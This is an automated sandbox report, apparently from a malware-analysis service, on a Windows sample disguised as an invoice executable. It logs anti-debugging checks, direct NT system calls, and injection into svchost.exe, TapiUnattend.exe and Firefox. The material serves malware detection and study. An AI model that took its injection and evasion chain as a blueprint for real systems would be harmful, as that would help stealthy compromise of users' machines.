            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]1_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]1_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]1_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]1_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]1_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]1_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]1_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]1_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]1_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]1_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]1_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]1_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]1_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03242840 mov ecx, dword ptr fs:[00000030h]1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260854 mov eax, dword ptr fs:[00000030h]1_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230887 mov eax, dword ptr fs:[00000030h]1_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC89D mov eax, dword ptr fs:[00000030h]1_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA8E4 mov eax, dword ptr fs:[00000030h]1_2_032FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C8F9 mov eax, dword ptr fs:[00000030h]1_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C8F9 mov eax, dword ptr fs:[00000030h]1_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E8C0 mov eax, dword ptr fs:[00000030h]1_2_0325E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EF28 mov eax, dword ptr fs:[00000030h]1_2_0325EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E6F00 mov eax, dword ptr fs:[00000030h]1_2_032E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232F12 mov eax, dword ptr fs:[00000030h]1_2_03232F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CF1F mov eax, dword ptr fs:[00000030h]1_2_0326CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325AF69 mov eax, dword ptr fs:[00000030h]1_2_0325AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325AF69 mov eax, dword ptr fs:[00000030h]1_2_0325AF69
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\TapiUnattend.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeThread register set: target process: 1836Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeThread APC queued: target process: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2609008Jump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe"Jump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
